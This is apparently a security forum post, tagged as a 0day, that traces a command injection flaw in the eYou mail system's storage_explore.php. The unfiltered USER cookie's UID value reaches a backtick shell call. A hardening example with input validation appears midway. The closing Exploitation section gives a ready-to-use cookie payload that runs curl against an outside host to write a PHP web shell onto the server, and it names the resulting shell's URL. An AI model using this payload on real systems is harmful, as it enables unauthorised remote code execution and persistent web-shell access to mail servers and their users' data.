『河马』eYou Storage_explore.php Cookie Command Injection Exploit Tool


File: /user/storage_explore.php
<?php
/**
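* User network storage list
*
* This page shows the logged-in mailbox user's list of network storage files; selected files are added to the mail as attachments.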
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// Get the maximum attachment size the user is allowed to upload
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
Following into the getCookieUserValue function:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

Following into the cookie function:

function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
    return '';
}

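Nowhere in this process is the cookie filtered.

The value of USER is taken straight out of the cookie and then passed into the getUserDirPath function.

Let's look at the getUserDirPath function: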

/**
* Get the path of the user's directory
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

uid and domain go directly into the command string, which results in command execution.
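The root cause above can be closed by validating both values and never handing them to a shell. The following is an added example, not eYou code and not part of the original post; the function names, the allowlist patterns and the $hashid parameter are assumptions, and only the hashid path is taken from the page.

```php
<?php
// Added example (not eYou code): a hardened take on getUserDirPath().
// Assumed names: isValidUid, isValidDomain, getUserDirPathSafe, $hashid.

/** Accept only mailbox-style local parts: no shell metacharacters, no spaces. */
function isValidUid(string $uid): bool {
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $uid) === 1;
}

/** Accept only dot-separated hostname labels. */
function isValidDomain(string $domain): bool {
    return strlen($domain) <= 253
        && preg_match('/\A[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})+\z/', $domain) === 1;
}

function getUserDirPathSafe(string $uid, string $domain,
                            string $hashid = '/var/eyou/sbin/hashid'): ?string {
    // 1. Reject anything outside the allowlist before it gets near a process.
    if (!isValidUid($uid) || !isValidDomain($domain)) {
        return null;
    }
    // 2. The array form of proc_open (PHP 7.4+) executes the binary directly,
    //    so no shell ever parses the arguments.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open([$hashid, $uid, $domain], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return proc_close($proc) === 0 ? trim($out) : null;
}

// Constructed inputs: one well-formed pair and shapes that reach the shell
// in the original function. Only the validators run here, so no hashid
// binary is needed.
$samples = [
    ['alice', 'example.com'],
    ['1|id', 'example.com'],
    ['alice', 'example.com; id'],
    ['$(id)', 'example.com'],
];
foreach ($samples as [$uid, $domain]) {
    $ok = isValidUid($uid) && isValidDomain($domain);
    printf("%-10s %-18s %s\n", $uid, $domain, $ok ? 'accepted' : 'rejected');
}
```

Validation alone does not make a cookie-supplied UID trustworthy; the value is still chosen by the client, so it should be checked against the authenticated session on the server side.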



Exploitation:

Set the cookie to:

USER=UID=1|curl http://www.isafe.cc:8080/test.txt>>www.isafe.cc.php
Then visit localhost/user/storage_explore.php
At this point the file www.isafe.cc.php is created under localhost/user/

The shell address is:

localhost/user/www.isafe.cc.php
[This entry was edited by admin on 2017-10-14 07:51 PM]
Source: original to this site
Tags: 0day